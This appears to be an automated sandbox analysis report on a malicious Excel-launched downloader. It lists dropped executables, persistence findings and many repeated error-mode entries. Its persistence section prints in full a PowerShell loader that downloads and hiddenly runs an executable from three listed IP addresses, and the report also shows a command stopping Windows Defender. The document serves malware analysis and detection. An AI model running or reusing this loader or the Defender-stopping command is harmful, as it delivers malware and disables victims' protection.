Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeCode function: 8_2_002C2707 push 5A20CEDFh; retf 8_2_002C270C
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeCode function: 8_2_002C1176 push ebp; retf 8_2_002C1188
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeCode function: 8_2_002C1C51 push dword ptr [edi+67h]; retf 8_2_002C1C65
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeCode function: 8_2_002C29AE push 5A20CEBEh; retf 8_2_002C29D2
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_0046275E push es; ret 18_2_0046275F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_003E643E push es; ret 18_2_003E643F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_003C1176 push ebp; retf 18_2_003C1188
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_003C1C51 push dword ptr [edi+67h]; retf 18_2_003C1C65
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_0046275E push es; ret 20_2_0046275F
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_004F1C51 push dword ptr [edi+67h]; retf 20_2_004F1C65
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_004F1176 push ebp; retf 20_2_004F1188
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_0051643E push es; ret 20_2_0051643F

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;Jump to behavior
Drops PE filesShow sources
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeFile created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp0251.exeJump to dropped file

Boot Survival:

barindex
Uses sc.exe to modify the status of servicesShow sources
Source: unknownProcess created: C:\Windows\System32\sc.exe sc stop WinDefend

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
